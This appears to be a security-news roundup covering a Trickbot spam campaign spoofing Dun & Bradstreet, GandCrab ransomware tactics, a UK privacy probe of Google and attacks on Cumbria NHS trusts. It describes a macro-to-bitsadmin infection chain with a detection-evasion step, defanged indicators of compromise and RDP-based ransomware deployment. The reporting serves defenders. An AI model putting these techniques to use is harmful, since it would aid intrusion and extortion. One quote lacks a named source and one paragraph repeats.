Trickbot distributed in new spoofed ‘complaint’ emails

  • The spam emails tried to mimic Dun & Bradstreet’s official site by having a lookalike, fake domain.
  • These emails contained macros that drop malicious BAT files to initiate the download for Trickbot’s payload.

Trickbot, one of the persistent banking trojans these days, has been spotted with another spam campaign. This time the attackers have impersonated the prominent business analytics company, Dun & Bradstreet.

Spam emails touted as ‘complaint’ are found containing malicious macros that deliver Trickbot. It is reported that this Trickbot campaign was directed at people in the US.

The big picture

  • Spams have the subject line “FW: Company Complaint #DNBC920201TF” and come from a false domain “service@dnscomplaint[.]com”.
  • They contain a Word document attachment named ‘DNBC920201TF.doc’ which in turn, has malicious macros.
  • The macros are initiated once the attachment is opened. A number of BAT files are dropped into the system which has instructions to download and install Trickbot.
  • Then the bitsadmin.exe, a process used to manage jobs in the command center is copied by the macro and is renamed as ld0CIC0.exe. The reason for performing this step is to evade detection by security software.
  • ld0CIC0.exe downloads an EXE file as well as binary files, which are combined to form the Trickbot malware.

Domains registered in GoDaddy – This latest campaign’s emails were also observed to have multiple domains registered on GoDaddy.

“Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar. Because of new GDPR rules, we cannot easily find the registrants name or any further details. hosted on & sending emails via 95.211.143[.]199 | 185.203.33[.]172 | 95.211.197[.]182 | 85.17.76[.]82,” reported.

What can be done to prevent the infection?

Users are advised to disable macros from automatically opening in the Word doc. Newer versions of Microsoft Word usually have macros disabled by default.

Furthermore, any Word file received through emails should be opened in “protected view” which terminates malicious activities such as malware or DDE exploits, from running in the system.

Ransomware warning: The gang behind this virulent malware just changed tactics again

Researchers say that those behind GandCrab ransomware are now going ‘big game hunting’ for larger targets – and more money.

The gang behind a family of ransomware that has been active for well over a year now have tweaked their tactics in order to ensure the file-locking malware campaign is as effective as possible.

GandCrab first emerged in January 2018 and has remained one of the most successful forms of ransomware ever since, with those behind it regularly releasing new versions to counter free decryption tools developed by security researchers.

The newest version of the ransomware — GrandCrab 5.2 — was released in February and came just a day before the latest decryptor was released.

Now researchers at Crowdstrike have detailed some of the latest tactics the outfit behind GandCrab — which they refer to as Pinchy Spider — is deploying, signifying something of a shift in its targeting and deployment, with those behind it increasingly looking to compromise larger targets for a bigger payday.

GandCrab operates an affiliate model, with its authors providing the ransomware “as-a-service” to wannabe hackers in exchange for a 30 to 40 percent cut of the profits.

But now researchers have observed adverts for GandCrab being posted on underground forums, specifically targeted at crooks with skills around operating remote desktop protocols, virtual network computing and experience of infiltrating corporate networks.

By using remote desktop protocols and stolen credentials, attackers can lay the groundwork for a much larger attack, secretly using their access to move around the network and deploy GandCrab across several hosts before pulling the trigger on the infection.

Now, rather than a handful of machines being encrypted with ransomware, attackers can compromise entire networks — something they look to exploit in order to demand larger ransom payments in exchange for restoring the systems. Crowdstrike refers to this kind of attack technique as “big game hunting”.

However, what differentiates the GandCrab gang from others who use this model is how they monitize the attack. Other ransomware attack groups, such as those behind SamSam, request one lump sum payment. But with GandCrab, even network-wide attacks demand payments on a per-PC basis.

No matter how the attackers collect the illicit funds, the campaigns continue to be successful, as organisations give into ransom demands.

“Running successful big game hunting operations results in a higher average profit per victim, allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly,” wrote Crowdstrike researchers, who’ve also shared indicators of compromise for GrandCrab on the blog.

“Spammers, working with landing pages and corporate networking specialists — do not miss your ticket to a better life. We are waiting for you,” reads a translation of the advert.

New GandCrab v5.1 ransomware comes with new exploit kit distribution and TOR site features

  • The ransomware’s TOR site comes with a hidden private chat that can be enabled using one of the discount codes.
  • This allows dishonest data recovery firms to hide the final cost of the GandCrab decryption process from its customers.

It was only a few months back that free decryption tools were made available for GandCrab version 5.0 – 5.0.3. And, while these tools are yet to be made public, a new version of GandCrab has appeared. The developers of GandCrab released the new version – GandCrab v5.1 – within 24 hours of the release of the decryption tools.

According to an extensive report from Coveware, the latest version of the ransomware comes with a variety of distribution changes and UX updates to the GandCrab TOR sites.

Multiple attack vectors and distribution techniques

Highlighting on the attack vectors of the ransomware, the researchers said, “The primary attack vector for ransomware remains RDP ports, but GandCrab has a diverse array of distribution methods. While RDP-based ransomware attacks remain popular, automated attacks using exploit kits such as Fallout EK, Emotet, or credential stealers like Vidar have been linked to GandCrab infections as well.”

Given the wide use of these broadly available toolkits, the ransomware authors have increased the average size of GandCrab ransomware.

Hidden private chat

The ransomware’s TOR site comes with a hidden private chat that can be enabled using one of the discount codes. This allows dishonest data recovery firms to hide the final cost of the GandCrab decryption process from its customers, along with their chats with the GandCrab support.

The discount code can be requested over chat. However, it can only be activated on the systems of targeted users.

“After entering the code, the applicable discount is displayed and the USD ransom amount on the payment pages is automatically adjusted. Discounts range from 5-20% depending on the size of the ransom,” the Coveware researchers added.

The payment process for GandCrab v5.1 remains the same. Here, the affected users are required to pay the ransom in Dash rather than in Bitcoin. “The wallet address for each page is unique and is rigged to trigger an updated screen on the TOR site once the correct amount of coins hits the wallet,” the researchers explained.

The UK grills Google for potential data privacy violations

  • The search engine is now under investigation by UK’s Information Commissioner’s Office(ICO) after the former failed to meet GDPR guidelines.
  • Google may face fines as large as $4 billion if proven guilty with the violation.

After France and Sweden slashed Google for its data privacy violation, UK’s data regulatory body Information Commissioner Office (ICO) is now investigating the tech giant for another violation regarding GDPR adherence.

Earlier, Google was fined $57 million by France, followed by Sweden asking it to furnish more information regarding its privacy policy on location data.

The ICO is now cooperating with other regulatory bodies in Europe to investigate deeper into the search engine’s data privacy policies.

“This is mainly due to people becoming more informed about their rights and exercising them, which has generated greater engagement as organizations turn to us for advice. Google is an organization that offers products and services to a large number of individuals both in the UK and worldwide. We have received complaints regarding Google which are being reviewed,” said a spokesperson for ICO.

Continued troubles

Google’s privacy woes continue to trouble GDPR despite the former emphasizing on the guidelines associated with GDPR. The UK investigation comes ahead of fourth quarter financial results for Google’s parent company Alphabet.

Last year, the tech giant paid a whopping $5 billion in fines for promoting its apps unfairly on the Android operating system. And in 2017, it was slapped with a $2.7 billion fine in Europe for manipulating search results to unfairly promote its services.

Cyber Security Predictions: 2019 and Beyond

As you think about how to deploy in advance of a new year of cyber threats, here are the trends and activities most likely to affect your organization

In anticipating the major cyber security and privacy trends for the coming year, you can find plenty of clues in the events of the past 12 months. Among the now familiar forms of attack, cyber hacks of major corporate systems and websites continued in 2018 and will inevitably be part of the 2019 cyber security scene. Many well-known organizations around the world suffered significant breaches this year. The single largest potential data leak, affecting marketing and data aggregation firm Exactis, involved the exposure of a database that contained nearly 340 million personal information records.

Beyond all-too-common corporate attacks, 2018 saw accelerated threat activity across a diverse range of targets and victims. In the social networking realm, Facebook estimated that hackers stole user information from nearly 30 million people. A growing assortment of nation-states used cyber probes and attacks to access everything from corporate secrets to sensitive government and infrastructure systems. At the personal level, a breach into Under Armour’s MyFitnessPal health tracker accounts resulted in the theft of private data from an estimated 150 million people.

So, what can we expect on the cyber security front in the coming year? Here are some of the trends and activities most likely to affect organizations, governments, and individuals in 2019 and beyond.


Cumbria health trust hit by 147 cyber attacks in five years

Of these, 147 were directed at University Hospitals of Morecambe Bay NHS Trust (UHMBT), which runs hospitals in Barrow, Kendal, Morecambe and Lancaster.

The trust said it had spent £29,600 in 2017 dealing with the effects of cyber attacks.

The “vast majority” were “untargeted and unsuccessful”, it said.

Lee Coward, the trust’s head of information technology, said its “very rigorous reporting” process mean it was possible it had reported “higher volumes of identified cyber ‘attacks’ than other organisations”.

“We spend a lot of time and resources on ensuring our IT systems are safe,” he continued.

University of Cumbria senior lecturer in policing and criminology Iain Stainton said the number of attacks on UHMBT was “extraordinary”.

The National Cyber Security Centre average was 10 per week across the UK, he said.

‘Extraordinary’ attacks

A Freedom of Information (FOI) request by BBC News found the rest of the county’s councils and NHS trusts were, by comparison, targeted 14 times in total between 2014 and 2018.

Emergency patients had to be transferred from Whitehaven to Carlisle in 2017 because hackers demanding ransom money had locked NHS staff out of computer systems.

Copeland Borough Council spent £2m recovering from an attack later the same year, it said.

Independent elected mayor Mike Starkie said the effect on the council had been “devastating”.

“And it wasn’t recognised either,” he said.

“We had 60 anti-virus systems running and only three of those actually detected that there was anything in the system.

“None of them picked up actually what it was.”

University of Cumbria senior lecturer in policing and criminology Iain Stainton said the number of attacks on UHMBT was “extraordinary”.

The National Cyber Security Centre average was 10 per week across the UK, he said.